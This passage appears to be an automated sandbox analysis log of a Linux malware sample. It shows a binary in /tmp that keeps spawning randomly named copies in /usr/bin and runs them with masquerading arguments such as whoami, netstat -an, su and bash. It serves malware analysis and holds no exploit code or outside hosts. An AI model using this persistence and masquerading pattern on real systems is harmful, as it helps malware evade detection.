File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wyyhrifhaz PID: 9602, Parent PID: 9601

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/usr/bin/wyyhrifhaz
Arguments:	/usr/bin/wyyhrifhaz bash 9446
File size:	625889 bytes
MD5 hash:	54dae078a67e6b3e3da231442bf638ad

Chronological Activities

Analysis Process: wyyhrifhaz PID: 9603, Parent PID: 9602

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/usr/bin/wyyhrifhaz
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	54dae078a67e6b3e3da231442bf638ad

Chronological Activities

Analysis Process: dkuidbsedp PID: 9612, Parent PID: 9446

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9613, Parent PID: 9612

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wyyhrifhaz PID: 9613, Parent PID: 9612

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/usr/bin/wyyhrifhaz
Arguments:	/usr/bin/wyyhrifhaz "cd /etc" 9446
File size:	625889 bytes
MD5 hash:	54dae078a67e6b3e3da231442bf638ad

Chronological Activities

Analysis Process: wyyhrifhaz PID: 9614, Parent PID: 9613

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/usr/bin/wyyhrifhaz
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	54dae078a67e6b3e3da231442bf638ad

Chronological Activities

Analysis Process: dkuidbsedp PID: 9623, Parent PID: 9446

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9624, Parent PID: 9623

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wyyhrifhaz PID: 9624, Parent PID: 9623

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/usr/bin/wyyhrifhaz
Arguments:	/usr/bin/wyyhrifhaz whoami 9446
File size:	625889 bytes
MD5 hash:	54dae078a67e6b3e3da231442bf638ad

Chronological Activities

Analysis Process: wyyhrifhaz PID: 9626, Parent PID: 9624

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/usr/bin/wyyhrifhaz
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	54dae078a67e6b3e3da231442bf638ad

Chronological Activities

Analysis Process: dkuidbsedp PID: 9634, Parent PID: 9446

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9635, Parent PID: 9634

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wyyhrifhaz PID: 9635, Parent PID: 9634

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/usr/bin/wyyhrifhaz
Arguments:	/usr/bin/wyyhrifhaz id 9446
File size:	625889 bytes
MD5 hash:	54dae078a67e6b3e3da231442bf638ad

Chronological Activities

Analysis Process: wyyhrifhaz PID: 9636, Parent PID: 9635

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/usr/bin/wyyhrifhaz
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	54dae078a67e6b3e3da231442bf638ad

Chronological Activities

Analysis Process: dkuidbsedp PID: 9644, Parent PID: 9446

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9646, Parent PID: 9644

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wyyhrifhaz PID: 9646, Parent PID: 9644

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/usr/bin/wyyhrifhaz
Arguments:	/usr/bin/wyyhrifhaz "netstat -an" 9446
File size:	625889 bytes
MD5 hash:	54dae078a67e6b3e3da231442bf638ad

Chronological Activities

Analysis Process: wyyhrifhaz PID: 9647, Parent PID: 9646

General

Start time:	09:48:26
Start date:	27/07/2022
Path:	/usr/bin/wyyhrifhaz
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	54dae078a67e6b3e3da231442bf638ad

Chronological Activities

Analysis Process: dkuidbsedp PID: 9656, Parent PID: 9446

General

Start time:	09:48:31
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9657, Parent PID: 9656

General

Start time:	09:48:31
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wrfeamwlub PID: 9657, Parent PID: 9656

General

Start time:	09:48:31
Start date:	27/07/2022
Path:	/usr/bin/wrfeamwlub
Arguments:	/usr/bin/wrfeamwlub id 9446
File size:	625889 bytes
MD5 hash:	2cc8aeffc8af7addf44cb78168298206

Chronological Activities

Analysis Process: wrfeamwlub PID: 9658, Parent PID: 9657

General

Start time:	09:48:31
Start date:	27/07/2022
Path:	/usr/bin/wrfeamwlub
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	2cc8aeffc8af7addf44cb78168298206

Chronological Activities

Analysis Process: dkuidbsedp PID: 9667, Parent PID: 9446

General

Start time:	09:48:31
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9668, Parent PID: 9667

General

Start time:	09:48:31
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wrfeamwlub PID: 9668, Parent PID: 9667

General

Start time:	09:48:31
Start date:	27/07/2022
Path:	/usr/bin/wrfeamwlub
Arguments:	/usr/bin/wrfeamwlub ls 9446
File size:	625889 bytes
MD5 hash:	2cc8aeffc8af7addf44cb78168298206

Chronological Activities

Analysis Process: wrfeamwlub PID: 9669, Parent PID: 9668

General

Start time:	09:48:31
Start date:	27/07/2022
Path:	/usr/bin/wrfeamwlub
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	2cc8aeffc8af7addf44cb78168298206

Chronological Activities

Analysis Process: dkuidbsedp PID: 9678, Parent PID: 9446

General

Start time:	09:48:31
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9679, Parent PID: 9678

General

Start time:	09:48:31
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wrfeamwlub PID: 9679, Parent PID: 9678

General

Start time:	09:48:31
Start date:	27/07/2022
Path:	/usr/bin/wrfeamwlub
Arguments:	/usr/bin/wrfeamwlub "echo \"find\"" 9446
File size:	625889 bytes
MD5 hash:	2cc8aeffc8af7addf44cb78168298206

Chronological Activities

Analysis Process: wrfeamwlub PID: 9680, Parent PID: 9679

General

Start time:	09:48:31
Start date:	27/07/2022
Path:	/usr/bin/wrfeamwlub
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	2cc8aeffc8af7addf44cb78168298206

Chronological Activities

Analysis Process: dkuidbsedp PID: 9689, Parent PID: 9446

General

Start time:	09:48:32
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9690, Parent PID: 9689

General

Start time:	09:48:32
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wrfeamwlub PID: 9690, Parent PID: 9689

General

Start time:	09:48:32
Start date:	27/07/2022
Path:	/usr/bin/wrfeamwlub
Arguments:	/usr/bin/wrfeamwlub "ifconfig eth0" 9446
File size:	625889 bytes
MD5 hash:	2cc8aeffc8af7addf44cb78168298206

Chronological Activities

Analysis Process: wrfeamwlub PID: 9691, Parent PID: 9690

General

Start time:	09:48:32
Start date:	27/07/2022
Path:	/usr/bin/wrfeamwlub
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	2cc8aeffc8af7addf44cb78168298206

Chronological Activities

Analysis Process: dkuidbsedp PID: 9700, Parent PID: 9446

General

Start time:	09:48:32
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9701, Parent PID: 9700

General

Start time:	09:48:32
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wrfeamwlub PID: 9701, Parent PID: 9700

General

Start time:	09:48:32
Start date:	27/07/2022
Path:	/usr/bin/wrfeamwlub
Arguments:	/usr/bin/wrfeamwlub id 9446
File size:	625889 bytes
MD5 hash:	2cc8aeffc8af7addf44cb78168298206

Chronological Activities

Analysis Process: wrfeamwlub PID: 9702, Parent PID: 9701

General

Start time:	09:48:32
Start date:	27/07/2022
Path:	/usr/bin/wrfeamwlub
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	2cc8aeffc8af7addf44cb78168298206

Chronological Activities

Analysis Process: dkuidbsedp PID: 9711, Parent PID: 9446

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9712, Parent PID: 9711

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wgpgdetjwe PID: 9712, Parent PID: 9711

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/usr/bin/wgpgdetjwe
Arguments:	/usr/bin/wgpgdetjwe "ps -ef" 9446
File size:	625889 bytes
MD5 hash:	a23fddceeec8b0b1803afa96b34f57de

Chronological Activities

Analysis Process: wgpgdetjwe PID: 9713, Parent PID: 9712

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/usr/bin/wgpgdetjwe
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	a23fddceeec8b0b1803afa96b34f57de

Chronological Activities

Analysis Process: dkuidbsedp PID: 9722, Parent PID: 9446

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9723, Parent PID: 9722

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wgpgdetjwe PID: 9723, Parent PID: 9722

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/usr/bin/wgpgdetjwe
Arguments:	/usr/bin/wgpgdetjwe whoami 9446
File size:	625889 bytes
MD5 hash:	a23fddceeec8b0b1803afa96b34f57de

Chronological Activities

Analysis Process: wgpgdetjwe PID: 9724, Parent PID: 9723

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/usr/bin/wgpgdetjwe
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	a23fddceeec8b0b1803afa96b34f57de

Chronological Activities

Analysis Process: dkuidbsedp PID: 9733, Parent PID: 9446

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9734, Parent PID: 9733

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wgpgdetjwe PID: 9734, Parent PID: 9733

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/usr/bin/wgpgdetjwe
Arguments:	/usr/bin/wgpgdetjwe "ifconfig eth0" 9446
File size:	625889 bytes
MD5 hash:	a23fddceeec8b0b1803afa96b34f57de

Chronological Activities

Analysis Process: wgpgdetjwe PID: 9735, Parent PID: 9734

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/usr/bin/wgpgdetjwe
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	a23fddceeec8b0b1803afa96b34f57de

Chronological Activities

Analysis Process: dkuidbsedp PID: 9744, Parent PID: 9446

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9745, Parent PID: 9744

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wgpgdetjwe PID: 9745, Parent PID: 9744

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/usr/bin/wgpgdetjwe
Arguments:	/usr/bin/wgpgdetjwe "grep \"A\"" 9446
File size:	625889 bytes
MD5 hash:	a23fddceeec8b0b1803afa96b34f57de

Chronological Activities

Analysis Process: wgpgdetjwe PID: 9746, Parent PID: 9745

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/usr/bin/wgpgdetjwe
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	a23fddceeec8b0b1803afa96b34f57de

Chronological Activities

Analysis Process: dkuidbsedp PID: 9755, Parent PID: 9446

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9756, Parent PID: 9755

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: wgpgdetjwe PID: 9756, Parent PID: 9755

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/usr/bin/wgpgdetjwe
Arguments:	/usr/bin/wgpgdetjwe "route -n" 9446
File size:	625889 bytes
MD5 hash:	a23fddceeec8b0b1803afa96b34f57de

Chronological Activities

Analysis Process: wgpgdetjwe PID: 9758, Parent PID: 9756

General

Start time:	09:48:37
Start date:	27/07/2022
Path:	/usr/bin/wgpgdetjwe
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	a23fddceeec8b0b1803afa96b34f57de

Chronological Activities

Analysis Process: dkuidbsedp PID: 9766, Parent PID: 9446

General

Start time:	09:48:42
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9767, Parent PID: 9766

General

Start time:	09:48:42
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: zyapsjpaje PID: 9767, Parent PID: 9766

General

Start time:	09:48:42
Start date:	27/07/2022
Path:	/usr/bin/zyapsjpaje
Arguments:	/usr/bin/zyapsjpaje su 9446
File size:	625889 bytes
MD5 hash:	e6a731eab67241eef92d9748fd128432

Chronological Activities

Analysis Process: zyapsjpaje PID: 9768, Parent PID: 9767

General

Start time:	09:48:42
Start date:	27/07/2022
Path:	/usr/bin/zyapsjpaje
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	e6a731eab67241eef92d9748fd128432

Chronological Activities

Analysis Process: dkuidbsedp PID: 9777, Parent PID: 9446

General

Start time:	09:48:43
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9778, Parent PID: 9777

General

Start time:	09:48:43
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: zyapsjpaje PID: 9778, Parent PID: 9777

General

Start time:	09:48:43
Start date:	27/07/2022
Path:	/usr/bin/zyapsjpaje
Arguments:	/usr/bin/zyapsjpaje "ps -ef" 9446
File size:	625889 bytes
MD5 hash:	e6a731eab67241eef92d9748fd128432

Chronological Activities

Analysis Process: zyapsjpaje PID: 9779, Parent PID: 9778

General

Start time:	09:48:43
Start date:	27/07/2022
Path:	/usr/bin/zyapsjpaje
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	e6a731eab67241eef92d9748fd128432

Chronological Activities

Analysis Process: dkuidbsedp PID: 9788, Parent PID: 9446

General

Start time:	09:48:43
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9789, Parent PID: 9788

General

Start time:	09:48:43
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: zyapsjpaje PID: 9789, Parent PID: 9788

General

Start time:	09:48:43
Start date:	27/07/2022
Path:	/usr/bin/zyapsjpaje
Arguments:	/usr/bin/zyapsjpaje bash 9446
File size:	625889 bytes
MD5 hash:	e6a731eab67241eef92d9748fd128432

Chronological Activities

Analysis Process: zyapsjpaje PID: 9790, Parent PID: 9789

General

Start time:	09:48:43
Start date:	27/07/2022
Path:	/usr/bin/zyapsjpaje
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	e6a731eab67241eef92d9748fd128432

Chronological Activities

Analysis Process: dkuidbsedp PID: 9799, Parent PID: 9446

General

Start time:	09:48:43
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9800, Parent PID: 9799

General

Start time:	09:48:43
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: zyapsjpaje PID: 9800, Parent PID: 9799

General

Start time:	09:48:43
Start date:	27/07/2022
Path:	/usr/bin/zyapsjpaje
Arguments:	/usr/bin/zyapsjpaje ls 9446
File size:	625889 bytes
MD5 hash:	e6a731eab67241eef92d9748fd128432

Chronological Activities

Analysis Process: zyapsjpaje PID: 9801, Parent PID: 9800

General

Start time:	09:48:43
Start date:	27/07/2022
Path:	/usr/bin/zyapsjpaje
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	e6a731eab67241eef92d9748fd128432

Chronological Activities

Analysis Process: dkuidbsedp PID: 9810, Parent PID: 9446

General

Start time:	09:48:43
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9811, Parent PID: 9810

General

Start time:	09:48:43
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: zyapsjpaje PID: 9811, Parent PID: 9810

General

Start time:	09:48:43
Start date:	27/07/2022
Path:	/usr/bin/zyapsjpaje
Arguments:	/usr/bin/zyapsjpaje "echo \"find\"" 9446
File size:	625889 bytes
MD5 hash:	e6a731eab67241eef92d9748fd128432

Chronological Activities

Analysis Process: zyapsjpaje PID: 9812, Parent PID: 9811

General

Start time:	09:48:43
Start date:	27/07/2022
Path:	/usr/bin/zyapsjpaje
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	e6a731eab67241eef92d9748fd128432

Chronological Activities

Analysis Process: dkuidbsedp PID: 9821, Parent PID: 9446

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9822, Parent PID: 9821

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: yfiimchuiz PID: 9822, Parent PID: 9821

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/usr/bin/yfiimchuiz
Arguments:	/usr/bin/yfiimchuiz id 9446
File size:	625889 bytes
MD5 hash:	799bae277cbb415227a0100b46398b8f

Chronological Activities

Analysis Process: yfiimchuiz PID: 9823, Parent PID: 9822

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/usr/bin/yfiimchuiz
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	799bae277cbb415227a0100b46398b8f

Chronological Activities

Analysis Process: dkuidbsedp PID: 9832, Parent PID: 9446

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9833, Parent PID: 9832

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: yfiimchuiz PID: 9833, Parent PID: 9832

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/usr/bin/yfiimchuiz
Arguments:	/usr/bin/yfiimchuiz pwd 9446
File size:	625889 bytes
MD5 hash:	799bae277cbb415227a0100b46398b8f

Chronological Activities

Analysis Process: yfiimchuiz PID: 9835, Parent PID: 9833

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/usr/bin/yfiimchuiz
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	799bae277cbb415227a0100b46398b8f

Chronological Activities

Analysis Process: dkuidbsedp PID: 9843, Parent PID: 9446

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9844, Parent PID: 9843

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: yfiimchuiz PID: 9844, Parent PID: 9843

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/usr/bin/yfiimchuiz
Arguments:	/usr/bin/yfiimchuiz pwd 9446
File size:	625889 bytes
MD5 hash:	799bae277cbb415227a0100b46398b8f

Chronological Activities

Analysis Process: yfiimchuiz PID: 9845, Parent PID: 9844

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/usr/bin/yfiimchuiz
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	799bae277cbb415227a0100b46398b8f

Chronological Activities

Analysis Process: dkuidbsedp PID: 9854, Parent PID: 9446

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9855, Parent PID: 9854

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: yfiimchuiz PID: 9855, Parent PID: 9854

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/usr/bin/yfiimchuiz
Arguments:	/usr/bin/yfiimchuiz id 9446
File size:	625889 bytes
MD5 hash:	799bae277cbb415227a0100b46398b8f

Chronological Activities

Analysis Process: yfiimchuiz PID: 9856, Parent PID: 9855

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/usr/bin/yfiimchuiz
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	799bae277cbb415227a0100b46398b8f

Chronological Activities

Analysis Process: dkuidbsedp PID: 9865, Parent PID: 9446

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9866, Parent PID: 9865

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: yfiimchuiz PID: 9866, Parent PID: 9865

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/usr/bin/yfiimchuiz
Arguments:	/usr/bin/yfiimchuiz gnome-terminal 9446
File size:	625889 bytes
MD5 hash:	799bae277cbb415227a0100b46398b8f

Chronological Activities

Analysis Process: yfiimchuiz PID: 9867, Parent PID: 9866

General

Start time:	09:48:48
Start date:	27/07/2022
Path:	/usr/bin/yfiimchuiz
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	799bae277cbb415227a0100b46398b8f

Chronological Activities

Analysis Process: dkuidbsedp PID: 9876, Parent PID: 9446

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9877, Parent PID: 9876

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: txflbjqefg PID: 9877, Parent PID: 9876

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/usr/bin/txflbjqefg
Arguments:	/usr/bin/txflbjqefg "sleep 1" 9446
File size:	625889 bytes
MD5 hash:	75e59fa1a4720187f898957348fda126

Chronological Activities

Analysis Process: txflbjqefg PID: 9878, Parent PID: 9877

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/usr/bin/txflbjqefg
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	75e59fa1a4720187f898957348fda126

Chronological Activities

Analysis Process: dkuidbsedp PID: 9887, Parent PID: 9446

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9888, Parent PID: 9887

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: txflbjqefg PID: 9888, Parent PID: 9887

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/usr/bin/txflbjqefg
Arguments:	/usr/bin/txflbjqefg top 9446
File size:	625889 bytes
MD5 hash:	75e59fa1a4720187f898957348fda126

Chronological Activities

Analysis Process: txflbjqefg PID: 9889, Parent PID: 9888

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/usr/bin/txflbjqefg
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	75e59fa1a4720187f898957348fda126

Chronological Activities

Analysis Process: dkuidbsedp PID: 9898, Parent PID: 9446

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 9899, Parent PID: 9898

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: txflbjqefg PID: 9899, Parent PID: 9898

General

Start time:	09:48:54
Start date:	27/07/2022
Path:	/usr/bin/txflbjqefg
Arguments:	/usr/bin/txflbjqefg gnome-terminal 9446
File size:	625889 bytes
